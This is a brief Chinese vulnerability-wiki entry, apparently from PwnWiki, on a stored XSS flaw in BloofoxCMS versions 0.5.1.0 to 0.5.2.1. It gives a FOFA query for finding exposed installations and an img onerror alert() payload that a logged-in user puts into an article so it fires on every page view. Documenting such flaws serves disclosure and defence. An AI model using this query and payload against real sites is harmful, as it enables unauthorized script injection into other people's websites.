Loading
0

BloofoxCMS 0.5.2.1 存储型XSS

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

app="BloofoxCMS"

影响版本

0.5.1.0 -.5.2.1

XSS

登录有效的账号,在添加文章的时候插入Payload发布,每次访问均可触发:

<img src=# onerror=alert('xss')>

免费、自由、人人可编辑的漏洞库--PwnWiki.com